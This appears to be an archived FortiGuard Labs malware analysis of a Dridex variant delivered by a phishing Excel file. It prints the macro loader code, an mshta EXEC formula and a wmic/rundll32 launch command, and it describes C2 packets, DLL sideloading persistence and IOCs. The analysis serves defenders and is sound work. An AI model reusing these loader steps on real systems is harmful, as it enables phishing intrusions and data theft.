{ "id": "c79a14b4-27d2-41a4-ba11-2c03896893b0", "created_at": "2026-04-06T00:16:54.814865Z", "updated_at": "2026-04-10T13:11:59.531682Z", "deleted_at": null, "sha1_hash": "4814e593051578c4a1fc5ab229fb9b885eb85e15", "title": "New Dridex Variant Being Spread By Crafted Excel Document | FortiGurad Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2277893, "plain_text": "New Dridex Variant Being Spread By Crafted Excel Document |\r\nFortiGurad Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2021-09-10 · Archived: 2026-04-05 18:02:57 UTC\r\nFortiGuard Labs Threat Research Report\r\nAffected platforms:       Microsoft Windows\r\nImpacted parties:          Windows Users\r\nImpact:                           Collects sensitive information from victims’ computers and delivers and executes\r\nmalicious modules on victims’ device.\r\nSeverity level:                Critical\r\nDridex is a Trojan malware, also known as Bugat or Cridex, which is capable of stealing sensitive information\r\nfrom infected machines and delivering and executing malicious modules (dll).\r\nFortiGuard Labs recently captured new phishing email campaigns in the wild that included a specially crafted\r\nExcel document attachment. I did a deep research on one of them and discovered that once the malicious Excel\r\ndocument is opened on a victim’s machine, it downloads a new variant of Dridex.\r\nIn this analysis, I will elaborate how the Excel document downloads Dridex, how this version of Dridex runs on a\r\nvictim’s device, what sensitive information it collects, and how it delivers malicious modules (dll).\r\nThe Phishing Email of the Dridex Variant\r\nFigure 1.1 shows one of the recent phishing emails with a malicious Excel attachment infected with Dridex.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 1 of 16\n\nFigure 1.1 – Text of a recently captured phishing email\r\nAs you can see, this email disguises itself as sending Import Tariffs data to a customer, and then asking him/her to\r\nview the details by opening the  attached Excel file (in this case, “HF7.TRANS 2021.08.09.xlsb”).\r\nAnalysis of the Macro Inside the Excel Document\r\nWhen the recipient opens the attached Excel document, it contains a message at the top of the document in bold\r\nred letters asking them to “Please enable macros.” However, Excel displays a yellow “Security Warning” bar\r\ntelling the end user that macros are currently diabled, with the implication that clicking the button “Enable\r\nContent” may be risky, as shown in Figure 2.1.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 2 of 16\n\nFigure 2.1 – Excel displays a warning bar when opening the infected Excel document\r\nLooking into the internal details of the Excel file, I found that it not only used auto-run Macro(VBA) but\r\nalso Excel 4.0 Macro. There is an auto-run function called Workbook_Open() in the Macro(VBA), which is\r\nautomatically called when the Excel file is opened.\r\nThe code is included below:\r\nSub Workbook_Open()\r\n    ActiveWorkbook.Sheets(\"Macro1\").Range(\"A1\").Value=Environ(\"allusersprofile\")\u0026 \r\n    \"\\KgmsgJbgP.sct\"\r\nEnd Sub\r\nIt only sets the value Environ(\"allusersprofile\")\u0026 \"\\KgmsgJbgP.sct\" (“C:\\ProgramData\\KgmsgJbgP.sct” in my\r\ntesting environment) to the “$A$1” cell of a sheet called “Macro1”.\r\n“Macro1” is a hidden sheet that contains and executes the Excel 4.0 Macro, which is defined in the file\r\n“xl\\workbook.xml” as shown in Figure 2.2.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 3 of 16\n\nFigure 2.2 – Excel 4.0 Macro sheet is defined in “Workbook.xml”\r\nExcel 4.0 macros use formulas in various cells to execute code. As long as you give it a starting cell, it executes\r\ncode from top to down, then from left to right.\r\nAfter the auto-run Macro(VBA) is executed, the Excel 4.0 Macro is executed automatically starting from the cell\r\n“Macro1!$A$4”.\r\nThe Excel 4.0 Macro extracts data from a bunch of cells within the “Macro1” sheet into a local file, whose file\r\npath is saved in $A$1, which is “C:\\ProgramData\\KgmsgJbgP.sct”. The extracted data is an HTML application\r\n(.hta file) with a piece of VBScript code. The last step of the Excel 4.0 Macro is to execute this “KgmsgJbgP.sct”\r\nfile using the “mshta” command, which is =EXEC(CONCATENATE(\"mshta \", CHAR(34), A1, CHAR(34))).\r\nThe final command to be executed is “mshta.exe C:\\ProgramData\\KgmsgJbgP.sct“. “mshta.exe” is a Windows\r\ndefault program that is used to execute an html application (.hta file) with HTML, Dynamic HTML, and one or\r\nmore scripting languages supported by Internet Explorer, such as VBScript or JScript.\r\nHTML Application Used to Download the Dridex Payload\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 4 of 16\n\nFigure 3.1 – Malicious VBScript code in the extracted hta file\r\nThe VBScript code, as shown in figure 3.1, includes an array of ten URLs (refer to the “IOCs” section below for\r\ndetails) that link to the Dridex payload. It downloads Dridex from these ten URLs in a for-loop into a local file,\r\n“%ALLUSERSPROFILE%\\\\icXBOuZukiASGnpfVowZ.dll”, that is hardcoded in this VBScript code. When\r\nDridex is downloaded successfully, it then executes “wmic.exe” (the WMI command-line) to create a new process\r\nof “rundll32.exe”.\r\nThe simplified code looks like this:\r\nCreateObject(\"Wscript.Shell\").Exec(\"wmic process call create \\\"Rundll32.exe\r\n%ALLUSERSPROFILE%\\\\icXBOuZukiASGnpfVowZ.dll ReportDeviceAdd\\\"\")\r\nFinally, Rundll32.exe loads the Dridex payload file “icXBOuZukiASGnpfVowZ.dll” and the calls its export\r\nfunction, named “ReportDeviceAdd”, to execute its malicious functions.\r\nDiving Into the Downloaded Dridex Payload File\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 5 of 16\n\nFigure 4.1 – The Dridex variant’s export function list in IDA Pro\r\nFigure 4.1 shows the export function list of the payload file of Dridex in IDA Pro. It contains two functions:\r\nDllEntryPoint() is the entry function for this dll. And FWroeeWqoinnmw() is the real entry function. An odd thing\r\nhere is that there is no function for “ReportDeviceAdd”, which should be the starting point of this Dridex variant.\r\nTo figure this out, we analyzed the internal strategy Rundll32.exe uses to load a module and then call its export\r\nfunction. Figure 4.2 shows the export function list of the Dridex payload file after it is unpacked. It provides six\r\nexport functions. The fourth function is “ReportDeviceAdd”.\r\nFigure 4.2 – The export function list of unpacked payload file\r\nHere are the steps for how the Dridex payload file is loaded by Rundll32.exe.\r\nThe steps used by Rundll32 to load a dll and invoke the export function:\r\n1. Rundll32.exe calls the API LoadLibrary() to load the dll into the memory and then deploy it according to\r\nits PE structure.\r\n2. It first invokes the dll’s entry point function—DllEntryPoint()—to initialize the module.\r\n3. It then calls API GetProcAddress() with the function name “ReportDeviceAdd” to obtain the function\r\naddress from the initialized module in step 2.\r\n4. Rundll32.exe then calls the function address obtained in step 3.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 6 of 16\n\nThis payload file also contains a packer-like program to protect itself from being researched by people. It\r\ndoes the unpacking in step 2 when the payload file’s DllEntryPoint() is called.\r\nFrom this point, Rundll32.exe is able to obtain ReportDeviceAdd by calling the API GetProcAddress().\r\nAnti-analysis Techniques Used in Dridex\r\nMost modern malware includes anti-analysis techniques in their code to prevent it from being analyzed.\r\nThis Dridex variant uses anti-analysis techniques similar to another Dridex variant I analyzed last year, which are:\r\nAll APIs are hidden and are found by its name’s hash code.\r\nEntire constant strings are encrypted in memory and decrypted just before using.\r\nSome APIs are called in a crafted way to raise an exception (0x80000003) on purpose. It then captures the\r\nexception in the exception handler function to actually call the API.\r\nFormat of the Packet Sent to the C2 Server\r\nDridex collects sensitive data from the victim’s infected device, which is then placed into a formated packet,\r\nencrypted, and sent to the C2 server.\r\nFigure 5.1 is a screenshot of the first packet to a C2 server that was about to be encrypted. All the packets to the\r\nC2 server have the same packet format. As an example, I’ll elaborate on the format of the packet below, which has\r\nbeen separated into many fields by a red pipe in the screenshot.\r\nThe selected part is common data for all packets, which is refered as a “packet header” in this analysis.\r\nFigure 5.1 – The first packet to the C2 server before encrypted\r\nTable 5.1 explains the content of each field in the packet format.\r\nOffset Length Data\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 7 of 16\n\n0x00 0x01 The length of the victim’s ID string.\r\n0x01 0x29 The victim’s ID string, which is variable.\r\n0x2A 0x20 The hard drive’s volume Information for the infected device.\r\n0x4A 0x02 Dridex version information—which is 0x56B9 in this variant.\r\n0x4C 0x04 A dword mixed with infected Windows version information.\r\n0x50 0x04 Packet Type Identification. 0x18F8C844 is for the first packet.\r\n0x54 0x01 Windows platform. 0x20 for 32-bit, 0x40 for 64-bit.\r\n0x55 variable Collected data from the victim’s system.\r\nTable 5.1 – Decryption of the fields of the packet\r\n- The victim’s ID string contains the computer name, underscore, and an MD5 hashcode of a string that includes\r\nthe computer name, user name, and the Windows system’s install date.\r\n- The hard drive’s volume information is an MD5 value made from data of the volume  information of “C:\\” and\r\nthe Windows installation date.\r\n- 0x56B9 is hardcoded data in the malware, possibly the malware version.\r\n- 0x11C1B11D is a mixed data set of Windows version information, which is obtained from the result of the APIs\r\nGetVersionEx() and GetSystemInformation().\r\n- Dridex has five packet type IDs in this variant used to notify the C2 server. They are 0x18F8C844,\r\n0x69BE7CEE, 0x11041F01, 0xD3EF7577, and 0x32DC1DF8.\r\n- The data following  0x20 indicates that the victim’s Windows system is 32-bit platform.\r\nThe field values of every Dridex packet header (except for packet type ID) are the same for all the packets on the\r\nsame machine.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 8 of 16\n\nThe collected data (starting from offset 0x55) is appended to the packet header, which has two fields—the\r\ncollected data size (four bytes in network byte order) and the collected data followed.\r\nSending Collected Information to the C2 Server\r\nAs with its previous version, the IP address and port of C2 servers are hardcoded in the data. Below is the IP list in\r\nbinary of the three C2 servers.\r\n.data:72C6D02C         dd 2C94B67h     ; IP: 103.75.201.2\r\n.data:72C6D030         dw 1BBh         ; port: 443\r\n.data:72C6D032         dd 6C01DF9Eh    ; IP: 158.223.1.108\r\n.data:72C6D036         dw 1851h        ; port: 6225\r\n.data:72C6D038         dd 0F21C16A5h   ; IP: 165.22.28.242\r\n.data:72C6D03C         dw 1238h        ; port: 4664\r\nThe malware chooses one IP address and port pair in an for-loop. Once one connection to the C2 server is\r\nsuccessfully established, it is used throughout the process life.\r\n“0x18F8C844” is the packet ID for the very first packet. The collected data consists of the entire installed\r\nsoftware (including software name and version) and all environment variables defined in the infected system.\r\nIt obtains the installed software information one-by-one by enumerating the sub-keys under the key\r\n“HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall” in the system registry.\r\nIt also steals the values of environment variables defined in the victim’s system. On my testing machine, they\r\nare  ALLUSERSPROFILE, APPDATA, CommonProgramFiles, COMPUTERNAME, ComSpec,\r\nFP_NO_HOST_CHECK, HOMEDRIVE, HOMEPATH, LOCALAPPDATA, LOGONSERVER,\r\nNUMBER_OF_PROCESSORS, OS, Path, PATHEXT, PROCESSOR_ARCHITECTURE,\r\nPROCESSOR_IDENTIFIER, PROCESSOR_LEVEL, PROCESSOR_REVISION, ProgramData, ProgramFiles,\r\nPSModulePath, PUBLIC, QT_AUTO_SCREEN_SCALE_FACTOR, SystemDrive, SystemRoot, TEMP, TMP,\r\nUSERDOMAIN, USERNAME, USERPROFILE, VS140COMNTOOLS, and windir.\r\nIt calls the API GetEnvironmentStringsW() to obtain all the values of the above environment variables. Figure 6.1\r\nshows a partial set of the name-value pairs obtained in memory.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 9 of 16\n\nFigure 6.1 – Display of obtained environment variables in the victim’s device\r\nOnce the first packet is finished, Dridex encrypts the packet and sends it to the C2 server using the HTTP POST\r\nmethod. It invokes a group of APIs to send and receive the data, such as InternetConnectW(),\r\nHttpOpenRequestW(), HttpSendRequestW(), HttpQueryInfoW(), and InternetReadFile().\r\nUnfortunately, its C2 servers were down during my analysis, so it was unable to send/receive data to/from the C2\r\nservers. But according to its code workflow, I could create a fake C2 server of Dridex to simulate the server’s\r\nbehaviors to receive and reply to Dridex to continue my research. The following analysis is based on this\r\nsimulated data.\r\nDeploying a Malicious Module From C2 Server and Performing Persistence\r\nAfter receiving the response packet to the first packet from the C2 server, it sends the second packet (packet ID\r\n0x11041F01) with no collected data. It should reply with a malicious module (dll file) in the response packet.\r\nDridex verifies the response packet by comparing the packet’s hash code, which is the first four bytes of the\r\npacket. Next, Dridex sends another packet (packet ID 0xD3EF7577) to inform the C2 server that it has\r\nsuccessfully received the module.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 10 of 16\n\nFigure 7.1 - A module extracted from the second response packet.\r\nThe second response packet contains an encrypted module (dll) . After Dridex verifies the received packet, it\r\ndecrypts the module—which is like the memory data displayed at the bottom of Figure 7.1.\r\nDridex then proceeds to deploy this malicious module onto the victim’s machine and then creats a scheduled task\r\nto run the module. Let’s see how it does this.\r\nTo keep the module running secretly on the victim’s machine, Dridex uses a Windows default program to load and\r\nrun it. It randomly chooses a pair of Windows program (exe) and a dll file from “%windir%\\system32” that\r\nthe chosen program has to load. Next, Dridex can override the chosen dll file with the received module. Hence,\r\nonce the chosen program starts, the malicious module within the chosen dll is executed.\r\nIn this way, the victim only supposes that a Windows program is running, not a malware module.\r\nFigure 7.2 is a screenshot of the just-chosen pair of Windows program and the dll file from\r\n“%windir%\\system32\\”\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 11 of 16\n\nFigure 7.2 – Chosen Windows program and dll\r\nDridex copies the chosen Windows program (this time, it’s“sdclt.exe”) into a newly-created folder, with random\r\nstring (like “Okuo”) under the “%appdata%” folder. Meanwhile, it reads the chosen dll (“slc.dll”) into memory\r\nand then it overrides its data with the malicious module obtained from the response to the second packet. Finally,\r\nDridex calls the API WriteFile() to save it to the same folder of the copied Windows program. From now on,\r\nwhenever the Windows program—“sdclt.exe”—starts, it loads and executes the “slc.dll” that contains the\r\nmalicious module.\r\nDridex then creates a scheduled task in the infected Windows system to achieve persistence on the victim’s\r\nmachine. The action of the task is just to start the copied Windows program (i.e. “sdclt.exe”) and it is triggered\r\nto repeat this action every 30 minutes.\r\nFigure 7.3 shows a screenshot of “Task Scheduler” with the added task named “Tixvzwbtojdsmg”, as well as the\r\ncopied “sdclt.exe” and “slc.dll” files in the folder “Okuo”.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 12 of 16\n\nFigure 7.3 – Added scheduled task and copied Window program and dll files.\r\nOther than adding to the scheduled task, it also calls the API CreateProcessW() to run “sdclt.exe” once just after it\r\nhas been deployed.\r\nBefore Dridex exits, it sends a packet with the ID 0x69BE7CEE to inform the C2 server that the malicious\r\npayload has been successfully installed on the victim’s machine. Figure 7.4 is a code snippet about to generate and\r\nsend this packet.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 13 of 16\n\nFigure 7.4 – Code snippet of handling packet 0x69BE7CEE\r\nConclusion - Dridex Variant \r\nYou have now learned how this Dridex campaign is run, including the phishing email, how the malicious code\r\ninside the attached Excel document is executed to extract an HTML application file, and finally, how a\r\nRundll32.exe is called to execute the downloaded Dridex payload file.\r\nI elaborated on how this variant of Dridex communicates with its C2 server, the fields contained in the packet,\r\nhow it asks the C2 server for a malicious module, and how the module is deployed onto the infected system.\r\nI also made a flow chart of how Dridex communicates with its C2 servers below in Figure 8.1. It clearly shows\r\nwhat packet and data was sent to the C2 server and when it received the malicious module. It will help you better\r\nunderstand the entire process.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 14 of 16\n\nFigure 8.1 - Communication flow chart between Dridex and its C2 server.\r\nFortinet Protections\r\nFortinet customers are already protected from this malware by FortiGuard’s Web Filtering, AntiVirus and\r\nFortiEDR services, as follows:\r\nThe downloading URLs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe attached Excel document and downloaded Dridex payload file are detected as \"MSExcel/Dridex.AC!tr\" and\r\n\"W32/Dridex.HMAH!tr\" and are blocked by the FortiGuard AntiVirus service.\r\nFortiMail users are protected by FortiGuard AntiVirus, which detects the original Excel document as a malicious\r\nattachment in the phishing email.\r\nFortiEDR detects the downloaded executable file as malicious based on its behavior.\r\nIOCs\r\nURLs:\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 15 of 16\n\n\"hxxps[:]//assettagger[.]saleseos[.]com/Classes/PHPExcel/Shared/JAMA/examples/RLFBubHuLTnm[.]php\"\r\n\"hxxps[:]//reportingdashboard[.]mobilisedev[.]co[.]uk/includes/6WSSUhQrM[.]php\"\r\n\"hxxps[:]//loans[.]uhuruloans[.]com/wp-includes/sodium_compat/namespaced/Core/ChaCha20/X8av4FUl7STEot3[.]php\"\r\n\"hxxps[:]//practice[.]haylawdesign[.]com/wp-content/themes/twentynineteen/template-parts/content/jE4zYiuJ0iIw[.]php\"\r\n\"hxxps[:]//kings[.]inforwizztechnologies[.]com/wp-content/plugins/aapside-master/elementor/widgets/tfOSpcBiZpffptj[.]php\"\r\n\"hxxps[:]//pizzaplus[.]com[.]ng/wp-content/themes/twentytwentyone/template-parts/content/TZ6qTYLx7l[.]php\"\r\n\"hxxps[:]//efshub[.]com/PHPMailer-master/examples/images/zunuLqqNQIGJPht[.]php\"\r\n\"hxxps[:]//user[.]kasikoi[.]info/static/lib/ckeditor/skins/moono/2h80F9GORDfIB[.]php\"\r\n\"hxxps[:]//deepsource[.]in/ncsitebuilder/css/flag-icon-css/flags/1x1/wcToKXeb7FxQ[.]php\"\r\n\"hxxps[:]//ebanking[.]hentostreasury[.]com/account/umSqqCiyMf[.]php\"\r\nC2 Sever IP and Port:\r\n\"103.75.201.2:443\" \r\n\"158.223.1.108:6225\"\r\n\"165.22.28.242:4664\"\r\nSample SHA-256:\r\n[HF7.TRANS 2021.08.09.xlsb]\r\n59C8D87A450F0647BEA930EBA1AA692B75D82DEF1358F1601C4FE9A561B4707E\r\n[DTCZ SHIP_2021.08.09.xlsb]\r\nC8065BD2A1443FF988E9BA95022554F6EE302E9BCB4082C3D9B2B8D74C5A4BE5 \r\n[icxbouzukiasgnpfvowz.dll]\r\n6556E4029CF50C9538F4E02D0BCCA5356F28E6870E62838E164020A31B3DF096\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard\r\nSecurity Subscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda\r\n(TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans\r\nprogram. Learn more about FortiGuard Labs global threat intelligence and research and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nSource: https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document" ], "report_names": [ "new-dridex-variant-being-spread-by-crafted-excel-document" ], "threat_actors": [ { "id": "68cc6e37-f16d-4995-a75b-5e8e2a6cbb3d", "created_at": "2024-05-01T02:03:07.943593Z", "updated_at": "2026-04-10T02:00:03.795229Z", "deleted_at": null, "main_name": "BRONZE EDISON", "aliases": [ "APT4 ", "DarkSeoul", "Maverick Panda ", "Salmon Typhoon ", "Sodium ", "Sykipot ", "TG-0623 ", "getkys" ], "source_name": "Secureworks:BRONZE EDISON", "tools": [ "Gh0st RAT", "Wkysol", "ZxPortMap" ], "source_id": "Secureworks", "reports": null }, { "id": "d4ac28d1-66eb-4f2d-9f9b-a72394349fd0", "created_at": "2023-01-06T13:46:38.667954Z", "updated_at": "2026-04-10T02:00:03.061447Z", "deleted_at": null, "main_name": "APT4", "aliases": [ "PLA Navy", "MAVERICK PANDA", "BRONZE EDISON", "SODIUM", "Salmon Typhoon" ], "source_name": "MISPGALAXY:APT4", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6fbff48b-7a3e-4e54-ac22-b10f11e32337", "created_at": "2022-10-25T16:07:23.318008Z", "updated_at": "2026-04-10T02:00:04.539063Z", "deleted_at": null, "main_name": "APT 4", "aliases": [ "APT 4", "Bronze Edison", "Maverick Panda", "Salmon Typhoo", "Sodium", "Sykipot", "TG-0623", "Wisp Team" ], "source_name": "ETDA:APT 4", "tools": [ "Getkys", "Sykipot", "Wkysol", "XMRig" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434614, "ts_updated_at": 1775826719, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4814e593051578c4a1fc5ab229fb9b885eb85e15.pdf", "text": "https://archive.orkl.eu/4814e593051578c4a1fc5ab229fb9b885eb85e15.txt", "img": "https://archive.orkl.eu/4814e593051578c4a1fc5ab229fb9b885eb85e15.jpg" } }